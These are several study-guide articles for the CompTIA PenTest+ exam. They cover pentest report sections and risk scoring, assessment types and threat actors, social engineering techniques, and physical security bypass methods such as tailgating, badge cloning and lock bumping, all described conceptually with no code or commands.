For the PenTest+ certification exam, you are expected to have an understanding of the basics of pentest report writing, including familiarity with the different sections of the report, what goes into the report, and how to securely store and transmit the report. At the completion of a pentest, the pentest report is a valuable asset for a business. Not only will the report contain a list of vulnerabilities that need to be fixed and remediation steps to follow to reduce the vulnerabilities, but it will also discuss the methodology that was followed for the current engagement and can act as a guide for future penetration tests. Before jumping into the structure of the report, let’s discuss two important concepts of pentest reports: normalization of data and risk appetite. Normalization of data It is important that you document your steps during the penetration test so that you can include them in your penetration report. You should also take screenshots during the penetration test so that you can include the screenshots within the pentest report as well. You also should normalize results so that they are all based on the same scale. For example, some testing tools may use a scale from 1 to 10, while others may use a scale of 1 to 8. You will need to convert the results based on a scale of 1 to 8 to be out of 10 so that all results are normalized and based on the same scale. Also, some tools may report the value of 1 being bad, while 10 is good, while another tool may report 1 as being a good value and 10 is a bad value. In this example, you will need to normalize the data by reversing the scale so that all the data can be plotted on the same chart in the pentest report. Risk appetite Risk appetite refers to the level of risk an organization is willing to accept. It is important to understand the organization’s risk appetite because you will need to prioritize the pentest results and provide remediation steps to the customer based on the organization’s tolerance of risk. The recommendations on remediation steps will stem from the results of the vulnerability scan and exploitation, but should also align with the company’s risk appetite. The risk appetite will depend on the function of the organization, for example, if it is an organization that affects public safety then the risk appetite (tolerance) will be low. Report structure It is important to remember that the purpose of the penetration test is to report on the findings of the pentest and give remediation steps on how to better secure the environment and reduce the risk to attack. The pentest report is a written report of findings and remediation steps that should include the following sections as outlined here. Title page and table of contents The title page for the report should contain a title for the report, such as “White Box Penetration Testing for Company ABC,” and the name of the company or person who performed the pentest and authored the report. The title page should also show a version number and date for the report. After the title page, the report should include a table of contents that specifies the page references for each of the other parts of the report. Executive summary The executive summary is a summary of the pentest for upper-level management or the executive team. It is typically written after the rest of the report has been written. The executive summary contains key information regarding the pentest that you would like to communicate to the executive team, such as the methodology used, the key tasks performed, and a high-level overview of your findings and recommendations. Methodology The methodology section of the report outlines the types of testing performed during the penetration test, the steps taken during each phase, and how the attacks were carried out. The methodology section also discusses the process used to identify and rate the risks for each vulnerability found and what tools were used by the pentesters. Within the methodology section you should also discuss the metrics and measures used to identify the risk rating for each of the vulnerabilities found during the assessment. For example, you could explain in the risk rating methodology that you are calculating risk by assigning a probability of low, medium, or high to each vulnerability and then assigning an impact of low, medium, or high to each vulnerability. Low has a value of 1, medium has a value of 2, and high has a value of 3. You can then calculate risk with the following formula: Risk = probability * impact You can then display a graphic outlining the scores for low risk (in my example it will be scores from 1 to 3), medium risk (scores 4 to 6), and high or critical risk (scores 7 to 9) as shown. Again, this is just an example. You can go with a 4- or 5-number scale for each category of probability and impact, which will give you a bit more variance in the risk rating scores. It is important to show how the risk scores are calculated, and use graphics in your report to help the reader relate to the results. Having a legend showing that low is green, medium is orange, and high or critical is red is also important, as you can use those colors in your findings to draw out critical vulnerabilities. Findings and remediation The findings and remediation section of the report is used to discuss the security issues found and the remediation steps to take to fix each security issue. Each security issue should have a paragraph or two describing the security issue and a paragraph describing the remediation steps. For example: Vulnerability Finding 1: Weak passwords used by user accounts Impact: High Likelihood: Medium Risk Rating: 6 Description: While assessing passwords on the network, it was found that many user accounts are using weak passwords made up of words found in the dictionary. These passwords were easily cracked by the John the Ripper tool. Remediation: It is recommended that password policies are configured to enforce complex passwords, lock out an account after three failed log-on attempts, keep a password history of 12 passwords, and require passwords to change every 60 days. Conclusion The conclusion is the last section in the report and should summarize the results as well as identify any parts of a typical penetration test that were not included in the assessment that the company may want to do in the future. For example, if social engineering was not part of the scope of the penetration test, you could recommend the organization perform social engineering during the next penetration test. In the conclusion of the report, you should also give the organization an overall risk score so that it can compare this result to the overall risk score of future penetration tests. The goal would be to see this risk score get lower with each penetration test. Secure handling and disposition of reports The penetration testing report contains a lot of sensitive information about an organization, such as Internet Protocol (IP) addresses of different systems, vulnerabilities that exist for the different systems, and the steps taken to exploit those vulnerabilities. This information is worth gold for a hacker, so you want to be sure to protect and control access to the report. Format The first point to make about keeping the report secure is that you must store penetration testing reports in an encrypted format to ensure that the information is kept confidential, and there should be a limited number of people who have access to the report. Any hard copies of the report should be kept in a secure location for an agreed-upon time. For the PenTest+ certification exam, remember that the pentest report should always be encrypted, both in storage and in transit. Storage time The second point to remember about keeping the report secure is how long the report is stored. The original pentest agreement should specify how long the pentesting organization has a copy of the report in its possession — and it must be stored in a secure location. The purpose for the pentesting organization to hold on to a copy of the report is to be able to answer questions from the customer related to the penetration test. Once the report is no longer needed, the pentest company should securely delete the digital copies and shred the hard copies.

Article / Updated 03-22-2021

Take a look at some penetration testing terminology you need to be familiar with for the CompTIA PenTest+ certification exam. Types of assessments The CompTIA PenTest+ certification objectives reference some key terms in regard to the different types of assessments that can be performed. The following are some common types of pentest assessments: Goals-based/objectives-based: This type of assessment is focused on a specific purpose. For example, you may have installed a new server or piece of software and want to test that specific asset for security flaws. Some examples of goals for goal-based assessments is the company may want to assess the security of only the wireless network, or maybe only perform social engineering attacks to test the effectiveness of the security education program with the employees. Another common goal may be simply to test the security of a public website or web application. Compliance-based: A compliance-based assessment is an assessment that is driven by standards and regulations. With compliance-based assessments, you must follow a standard assessment methodology, such as the National Institute of Standards and Technology’s (NIST’s) SP800-15 series of guidelines, or the PCI DSS from the PCI Security Standards Council. Red team/blue team: The term red team refers to the internal team of professionals performing a penetration test acting as hackers. With a red team test, you are not as focused on reporting and remediation steps after the fact; you are more focused on trying to bypass security controls and determining how your security team will respond to the attack. The security team responsible for defending against attacks is known as the blue team. Pentest strategies You can follow several different strategies when performing a penetration test. You can go with a black box text, a white box test, or a gray box test: Black box: In a black box penetration test, the testers are given zero information about the environment and the targets. The goal of the black box test is to treat the pentesters as if they are hackers — they have to discover the environment before they can attack the environment. In a black box test, you would not share Internet Protocol (IP) address information, network infrastructure details, or public services on the internet, such as websites, domain name system (DNS), or file transfer protocol (FTP) servers. It is up to the penetration testers to discover all assets and then try to exploit those assets. White box: In a white box penetration test, the testers are given all of the details of your network environment, including server configurations and the services they run, a network diagram showing different network segments and applications, and IP address information. Gray box: In a gray box penetration test, a limited amount of information is given to the penetration testers, such as the IP ranges being used by the company or addresses of your public internet servers. With this information, the pentesters will discover what services are running on each system and then try to exploit those systems. For the PenTest+ certification exam, remember the different pentest strategies. Black box is when no details about the target are given, white box is when all known information about the targets is given to testers, and gray box testing is when limited information such as IP addresses or server names are given to keep the pentest focused on those targets. Threat actors and threat models The purpose of penetration testing is to simulate attacks that could occur in real life. A big part of information security — and something all security professionals should be aware of — is who you are protecting against. Who would attack your network or website? Capabilities and intent Before we look at the types of hackers and threat models, it is important to understand the different levels of hacking capabilities for each type of hacker, or threat actor, and the different reasons of intent for hacking. The capabilities of a hacker will vary depending on the type of threat actor the hacker is and the types of attacks being performed. Some attacks are basic in nature, so you may find that all types of hackers can perform these attacks, while more sophisticated attacks are performed by hackers with more detailed knowledge of the underlining technologies being hacked, their vulnerabilities, and how to exploit those vulnerabilities. A hacker may be motivated to hack for many reasons, such as for financial gain (for example, hacking into bank accounts or selling sensitive data that was obtained in the hack) or for the fame or notoriety that is earned by hacking into a big-name company. A hacker may also be motivated by a personal cause or a group cause, as is the case with terrorists or activists. Threat actor A threat actor is a person or entity that causes the threat against your assets. When it comes to hacking, you should be aware of some common threat actors: Script kiddies: A script kiddie is a person who does not necessarily have much background on how attacks work, they simply run some automated tools to try to exploit systems. Their intent is typically for the challenge, and also bragging rights. Hacktivist: A hacktivist is a person who hacks for a cause, such as for political purposes or for social change. The capabilities of the hacktivist can range from basic to advanced hacking knowledge such as is the case with the infamous hacking group called “Anonymous.” Insider threat: Insider threats are threats from inside your organization or inside your network. These can be very serious threats of malicious destruction from a disgruntled employee or even innocent mistakes made by other employees. APT: An Advanced Persistent Threat (APT) is an advanced hacking process such as one found in a nation-state–sponsored group or person that gains unauthorized access to a network for political or economic reasons. The attack typically happens to gain unauthorized access for a long period of time, such as many months, by planting malicious software on the system that will monitor activity, collect sensitive data, or damage the system. APT also includes advanced hacks on financial institutions, defense contractors, and software companies, such as Twitter or Facebook, which would contain a wealth of sensitive information the hacker would like to collect. Adversary tier Threat actors are typically identified in an adversary tier that ranks the threat actors by their capabilities and the damage they can perform. The threat actors discussed earlier are ranked based on their threat level and capabilities, as follows (1=low, 4=high): Script kiddie Insider threat Hacktivist APT This figure summarizes the adversary tier, with script kiddies at the bottom of the skillset and APT at the top. Threat modeling Penetration testing typically involves an exercise known as threat modeling. Threat modeling refers to the act of documenting company assets and then defining the types of attacks or threats against those assets. The threats are then assigned a likelihood (the chances the attack will happen) and impact (how serious the result of the attack if successful) so that the threats can be prioritized. Based on the priority of the threats, security professionals put security controls in place to prevent those threats from occurring or to minimize the impact.

Article / Updated 03-22-2021

Social engineering from a security standpoint refers to the deliberate use of deception to try to trick a user into compromising system security through social contact such as an email message, a text message, or a phone call. Social engineering attacks are a common way to test the effectiveness of a company’s security education program. If the engagement rules and scope of the penetration test support social engineering attacks, you should plan for them in the penetration test. There are different types of social engineering attacks such as phishing, shoulder surfing, and USB key drop, among others. Take a look at the different types of social engineering. Phishing Phishing is a type of social engineering attack that occurs when the hacker sends an email message to a user with the hope that the user will click on hyperlinks within the message. These hyperlinks link to malicious websites that collect information from the user. For example, a hacker may send an email message that appears to be from the user’s banking institution, and links within the message take the user to a site that looks like the bank’s site. Because the site looks familiar to the user, the user may then feel comfortable supplying his or her account information, not knowing it is a fake bank site. All the time this is going on, the hacker is collecting the information that is typed into the fake site. With a regular phishing attack, the hacker sends the email message to a pool of email addresses the hacker was able to discover without really any thought to who the email goes to. When you do a penetration test, you can do the same: collect a bunch of email addresses for the target organization and then email all of the addresses to see if someone goes to the fake site. Phishing attacks occur in the following different forms: Spear phishing: Refers to a phishing attack that targets a specific person SMS phishing: Phishing attacks conducted through text messaging instead of email Voice phishing: Phishing attacks that use voice over the phone instead of email Whaling: Refers to a phishing attack that targets the “big fish” of a company, such as the CEO For the PenTest+ certification exam, remember the different forms of phishing attacks. Also remember that the rules of engagement should identify whether social engineering attacks are allowed in the penetration test. Shoulder surfing Shoulder surfing is a traditional type of attack in which the hacker watches over the shoulder of the user to see what the user is typing on the computer or mobile device to obtain information. USB key drop Another type of social engineering attack common with penetration testing is a USB key drop. With a USB key drop, the pentester will leave USB flash drives all over the organization in hopes that an employee picks it up and plugs it into a computer to see what is on the drive. As a penetration tester, you will configure a script or application to automatically run when the drive is connected that will send an email message to you that includes information such as the IP address of the system the drive is connected to. With USB key drop, you are able to find out the security awareness level of the organization. If you set out ten USB drives and you get eight email messages, it is obvious that the employees do not understand that they should not connect untrusted devices to their computers. Another benefit of using a USB key drop with your penetration test is that you can use it to collect information such as IP addresses of hosts on the network. You can then use these IP addresses as IP addresses of potential targets. Other forms of social engineering In addition to the types of social engineering attacks discussed in the previous sections, social engineering attacks may also take the form of impersonation and interrogation. For example, a hacker (or pentester) could impersonate an administrator to try to trick the user into compromising security (for example, maybe the hacker convinces the user to change his or her password). If social engineering attacks are in the scope of the assessment, you could try calling or emailing employees and impersonating the administrator to trick the employee into compromising security. You could also impersonate a user who contacts the administrator and see if the administrator can be tricked into helping you access the system. In addition, interrogation is another form of social engineering attack specifically called out in the objectives of the CompTIA PenTest+ certification exam. When interviewing or interrogating people, a number of physical reactions to questions can be used to identify topic areas that should lead to more questioning. For example, when people start to feel stress, they usually start to touch their face a lot — watch for these visual cues during interviews and interrogation. The key point to remember about social engineering is that your goal is elicitation. You would like to elicit a response or reaction from employees that cause them to compromise security. You could also use a business email compromise (BEC) attack where you gain access to an employee’s corporate email account and use that to send messages to other employees in the company. Motivation techniques in social engineering attacks What are some of the motivation techniques used in social engineering attacks that cause the attack to be successful? A common technique is to evoke a sense of urgency for the end user to click the link in an email message from the hacker. When social engineering attacks are sent out, the hacker usually stresses a sense of urgency to act now as a method to get the user to click the link or run the application without thinking about it too much. Following is a list of motivational techniques often used by the hacker or penetration tester to get a user to compromise security: Authority: The hacker or penetration tester pretends to be a person of authority requesting that the user perform an action. This action, such as clicking a link in an email message or changing a password, is enough to help the hacker gain access to the system. Scarcity: The communication from the hacker or pentester typically implies a shortage in time or the chance of a prize in order to trick the person into acting now. Social proof: The hacker or pentester relies on the concept that if users see others doing something, they feel it is the correct thing to do, so they do it too. For example, if everyone is downloading a certain program, a user may feel that it must be safe if everyone else is doing it. Urgency: The hacker or pentester evokes a sense of the importance of a swift action in order to get users to act on the request. Likeness: People respond well to people they like, and are, by nature, typically willing to help someone in need. If the attacker can appear to be in need and has a friendly demeanor, the victim may let his or her guard down and be more likely to respond to the social engineering attack. Fear: The hacker or pentester uses fear to elicit a response from the user. For example, a hacker sends an email message telling the user that a security vulnerability was found in the system that gives someone full access to the system, and to remove this vulnerability, the user must install a “patch.” In reality the patch is the malicious software that allows the attacker into the system.

Article / Updated 03-22-2021

Physical security plays an important role in any organization’s security program and defensive posture, and you need to know some basics about attacks on physical security to pass the CompTIA PenTest+ exam. Physical security involves controlling who has physical access to the facility, the servers, network equipment, and end-user devices. Types of physical security controls Organizations use a number of physical security controls to regulate who gains access to the facility or what areas in the facility they gain access to. Highly secured environments control access to the facility by having high fencing around the perimeter of the property with only one or two entrances used to enter or leave the facility. These entrances will have gates and security guards that control who gains access to the building. In highly secured locations, the guard ensures that everyone who enters has an ID badge. Visitors typically need to get a guest badge and be escorted by the employee that has the visitor to the facility. Once inside the building, doors are locked to control who can gain access to different areas of the building. Companies can use traditional lock and keys, combination locks, or use electronic locking systems where a card needs to be swiped in order to gain access to that area of the building. Exploiting physical security A number of methods may be used to bypass physical security controls. As a penetration tester, you may need to test these physical controls and see if you can bypass the security to gain access to areas of the building you should not have access to. Piggybacking/tailgating To compromise physical security as a penetration tester, you can try to follow an employee who does have access into a restricted area of the building after the employee unlocks the door. There are two terms for this type of physical security attack: Piggybacking: Piggybacking occurs when employees use their swipe card (key) to unlock a door and they allow the person behind them into the locked area as well without making that person swipe his or her card. This is exploiting the person’s human nature to hold the door open for the next person. As the penetration tester, you want to test to see if you can piggyback into the facility as this identifies a huge security concern. Note that with piggybacking, the person is aware that he or she is allowing you in. Tailgating: Tailgating is similar to piggybacking with the exception that the employee has no idea you slipped through the door after he or she had unlocked it. For the PenTest+ certification exam, remember the difference between piggybacking and tailgating. Piggybacking involves the employee knowing and allowing someone to gain access to a restricted area, while with tailgating, the employee did not know someone was able to gain access after the employee unlocked the door. A great countermeasure to implement to prevent piggybacking and tailgating is a mantrap. A mantrap is an area between two locked doors. The second door does not unlock until the first door locks. This ensures employees know who is with them at all times. Revolving doors is another type of mantrap that helps ensure no one else slips through the door while an employee is going through. Dumpster diving A method to discover sensitive information about a company and its employees is to dumpster dive. With dumpster diving, the attacker goes through the garbage of the intended victim trying to locate information that could help in an attack. It is important to shred all sensitive documents so that the sensitive information cannot be discovered via a dumpster dive attack. Badge cloning Electronic badges often are used to gain access to restricted areas within a building. If attackers can get their hands on a badge, they can use a badge cloning device to copy the electronic data stored on the badge that can then be used to gain access to the building. Fence jumping Having a fence around the perimeter of the facility is only going to keep the innocent people out. A determined hacker can easily climb the fence to gain access to the facility, so it is important that you have designed a fencing strategy that makes it difficult to climb. Most highly secured environments will use a high fence that angles out at a 45-degree angle at the top to make it difficult for someone to climb over. Companies will also have barb wire at the top to prevent someone from trying to climb over the top. Attacks on locks Traditional locks are susceptible to lock picking in order to gain access to the locked area. A bump key is one example of a lock-picking technique where a filed-down key is placed in the lock and then tapped (bumped) lightly while turning the key slightly. This causes all of the cylinders within the lock to jump up above the cylinder breaking point (hopefully), which would then unlock the door. Many high-quality locks today advertise that they are “bump proof.” Lock bypass is another lock-picking technique in which different methods are used to bypass the locking system. Some techniques used to bypass a lock is loiding, in which a credit card is used to bypass a self-closing latch system. Car locks can be bypassed by inserting a stiff wire between the door and the car structure in order to manipulate the locking system. Another example of an attack on locks is for motion-sensor doors that are in a locked state until they detect that someone is trying leave from the inside, at which time the door is unlocked. These doors use egress sensors (to detect people going out) that are motion sensors. There is a known hack where hackers are able to spray compressed air from outside through the cracks in the door to trigger the motion sensor to unlock the door.